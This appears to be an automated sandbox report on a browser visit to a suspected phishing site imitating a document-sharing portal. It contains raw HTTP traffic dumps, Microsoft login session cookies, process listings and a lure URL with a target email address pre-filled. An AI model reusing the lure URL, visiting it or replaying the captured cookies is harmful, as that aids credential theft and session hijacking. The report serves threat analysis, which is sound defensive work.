                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:30:18 UTC287INHTTP/1.1 200 OK
                                                        Content-Length: 31224
                                                        Content-Type: text/css
                                                        Expires: Thu, 24 Apr 2025 20:30:18 GMT
                                                        ETag: A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:30:18 GMT
                                                        Connection: close
                                                        2025-03-25 20:30:18 UTC16097INData Raw: 2a 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 53 65 67 6f 65 20 55 49 20 57 65 62 66 6f 6e 74 22 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61
                                                        Data Ascii: * { margin: 0px; padding: 0px;}html, body { height: 100%; width: 100%; background-color: #ffffff; color: #000000; font-weight: normal; font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Gra
                                                        2025-03-25 20:30:18 UTC15127INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 31 30 33 2c 20 31 38 34 29 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 31 30 33 2c 20 31 38 34 29 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 69 6d 61 67 65 2d 6f 75 74 73 65 74 3a 20 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 69 6d 61 67 65 2d 72 65 70 65 61 74 3a 20 73 74 72 65 74 63 68 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 69 6d 61 67 65 2d 73 6c
                                                        Data Ascii: background-color: rgb(0, 103, 184); border-bottom-color: rgb(0, 103, 184); border-bottom-style: solid; border-bottom-width: 1px; border-image-outset: 0px; border-image-repeat: stretch; border-image-sl


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.44979752.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:19 UTC638OUTPOST /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        Content-Length: 2379
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-type: application/json
                                                        Sdk-Context: appId
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://rutaann.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rutaann.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:30:19 UTC2379OUTData Raw: 5b 7b 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 33 2d 32 35 54 32 30 3a 33 30 3a 31 37 2e 38 35 38 5a 22 2c 22 69 4b 65 79 22 3a 22 62 36 39 38 32 64 35 65 2d 64 65 38 32 2d 34 32 66 38 2d 39 39 39 31 2d 61 62 35 64 36 37 36 62 61 32 32 39 22 2c 22 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 41 70 70 6c 69 63 61 74 69 6f 6e 49 6e 73 69 67 68 74 73 2e 62 36 39 38 32 64 35 65 64 65 38 32 34 32 66 38 39 39 39 31 61 62 35 64 36 37 36 62 61 32 32 39 2e 50 61 67 65 76 69 65 77 22 2c 22 74 61 67 73 22 3a 7b 22 61 69 2e 73 65 73 73 69 6f 6e 2e 69 64 22 3a 22 6d 71 53 52 68 22 2c 22 61 69 2e 64 65 76 69 63 65 2e 69 64 22 3a 22 62 72 6f 77 73 65 72 22 2c 22 61 69 2e 64 65 76 69 63 65 2e 74 79 70 65 22 3a 22 42 72 6f 77 73 65 72 22 2c 22 61 69 2e 69 6e 74 65
                                                        Data Ascii: [{"time":"2025-03-25T20:30:17.858Z","iKey":"b6982d5e-de82-42f8-9991-ab5d676ba229","name":"Microsoft.ApplicationInsights.b6982d5ede8242f89991ab5d676ba229.Pageview","tags":{"ai.session.id":"mqSRh","ai.device.id":"browser","ai.device.type":"Browser","ai.inte
                                                        2025-03-25 20:30:19 UTC291INHTTP/1.1 200 OK
                                                        Transfer-Encoding: chunked
                                                        Content-Type: application/json; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Access-Control-Allow-Origin: *
                                                        Date: Tue, 25 Mar 2025 20:30:19 GMT
                                                        Connection: close
                                                        2025-03-25 20:30:19 UTC102INData Raw: 36 30 0d 0a 7b 22 69 74 65 6d 73 52 65 63 65 69 76 65 64 22 3a 32 2c 22 69 74 65 6d 73 41 63 63 65 70 74 65 64 22 3a 32 2c 22 61 70 70 49 64 22 3a 22 31 34 38 39 37 37 66 38 2d 38 31 37 34 2d 34 39 35 39 2d 62 65 65 63 2d 36 39 64 64 63 35 66 30 39 31 38 32 22 2c 22 65 72 72 6f 72 73 22 3a 5b 5d 7d 0d 0a
                                                        Data Ascii: 60{"itemsReceived":2,"itemsAccepted":2,"appId":"148977f8-8174-4959-beec-69ddc5f09182","errors":[]}
                                                        2025-03-25 20:30:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.44979852.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:19 UTC400OUTGET /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:30:19 UTC232INHTTP/1.1 405 Method Not Allowed
                                                        Allow: POST
                                                        Content-Length: 0
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 25 Mar 2025 20:30:19 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.44980135.190.80.1443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:24 UTC592OUTOPTIONS /report/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:30:24 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-type, content-length
                                                        date: Tue, 25 Mar 2025 20:30:24 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.44980235.190.80.1443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:24 UTC600OUTOPTIONS /report/v4?s=7jbkxu4mns%2FD4i7vTYCTE8WTuUHzvYIXuWy8oFxgOXK67DzEgbSvqmqBnk%2FzwMzaDTbiAZE0c1pelBWVavwbhN%2F%2B5kK8HCPfi02O7k64So8ofCD8pL0PAUt%2FAtF11x%2Froalc%2F9qkIpEbWB6VewJtpiQHJfNJWQ%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:30:24 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Tue, 25 Mar 2025 20:30:24 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.44980435.190.80.1443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:24 UTC568OUTPOST /report/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 1023
                                                        Content-Type: application/reports+json
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:30:24 UTC1023OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 38 35 36 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 50 4f 53 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 70 6f 73 61 6c 64 6f 63 75 6d 65 6e 74 73 76 69 61 73 65 63 75 72 65 64
                                                        Data Ascii: [{"age":58568,"body":{"elapsed_time":133,"method":"POST","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandoned"},"type":"network-error","url":"https://proposaldocumentsviasecured
                                                        2025-03-25 20:30:24 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Tue, 25 Mar 2025 20:30:24 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.44980535.190.80.1443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:24 UTC575OUTPOST /report/v4?s=7jbkxu4mns%2FD4i7vTYCTE8WTuUHzvYIXuWy8oFxgOXK67DzEgbSvqmqBnk%2FzwMzaDTbiAZE0c1pelBWVavwbhN%2F%2B5kK8HCPfi02O7k64So8ofCD8pL0PAUt%2FAtF11x%2Froalc%2F9qkIpEbWB6VewJtpiQHJfNJWQ%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 537
                                                        Content-Type: application/reports+json
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:30:24 UTC537OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 37 34 32 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 37 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 39 32 2e 32 35 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 70 6f 73 61 6c 64 6f 63
                                                        Data Ascii: [{"age":57427,"body":{"elapsed_time":673,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.192.251","status_code":405,"type":"http.error"},"type":"network-error","url":"https://proposaldoc
                                                        2025-03-25 20:30:25 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Tue, 25 Mar 2025 20:30:24 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        020406080s020406080100

                                                        Click to jump to process

                                                        020406080s0.0050100MB

                                                        Click to jump to process

                                                        Target ID:1
                                                        Start time:16:29:13
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:16:29:16
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2204,i,2051777256994672153,7090731593673493070,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2272 /prefetch:3
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:16:29:22
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com"
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        No disassembly